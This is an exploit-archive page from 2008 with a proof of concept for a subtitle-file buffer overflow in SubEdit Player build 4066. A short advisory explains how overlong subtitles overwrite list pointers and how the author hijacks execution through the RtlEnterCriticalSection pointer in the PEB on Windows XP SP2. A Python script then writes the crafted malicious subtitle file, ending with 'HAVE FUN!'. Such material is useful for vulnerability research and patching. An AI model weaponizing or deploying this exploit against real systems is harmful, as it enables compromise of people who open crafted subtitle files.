SubEdit Player build 4066 subtitle Buffer Overflow PoC
Author:	grzdyl
Date:	2008-04-19
Download:

/===Subedit Player build 4066 subtitle BoF vulnerability=========|
|
| SubEdit Player is a very popular player and subtitles    
| editor in Poland. It does not perform any boundery checks         
| on supplied subtitles. This causes buffer overrun and
| throwing access violation exception on group of instructions:
|
|
| 005F7C1E  |. 8902           MOV DWORD PTR DS:[EDX],EAX
| 005F7C20  |. 8950 04        MOV DWORD PTR DS:[EAX+4],EDX
|    
| I thought in first moment that this is heap overflow, but
| why does these instructions appear in subedit module? And
| why on my winxp sp2 computer this is possible? So, I think
| that this program has own kind of dynamically list structure
| and I am able to overwrite its pointers.
|
| Ok so, I am controling EAX and EDX registers. In this
| situation I am able to use technique described by c0ntex
| ( thx mate! ) to overwrite a pointer to RtlEnterCriticalSection
| in PEB structure of ntdll. Thanks to this (after about 30
| access violations when writing - exceptions handlers throw
| exceptions handlers)
| I get:
|
|   
|  {Access violation when executing [42424242]}
|                                 
|  -Tested on Windows Xp sp2 fully patched.
|  -Greatz to: mewo
|
|  -Bug discovered by grzdyl         
|
=================================================================|
       
POC:
 
#!/usr/bin/python
 
sub = "{4143}{4200}"
sub += "B" * 4098
sub += "\x20\xf0\xfd\x7f"
sub += "A" * 398
 
fd = open("thematrix.txt", "w")
fd.write(sub)
fd.close()
 
print "FILE CREATED\nHAVE FUN!"
 

Comments (0)

Subscribe to this comment's feed

Show/Hide comments

Show/Hide comment form

Write comment

Name

Email

Website

Title

Comment

smaller | bigger

Subscribe via email (Registered users only)

Add Comment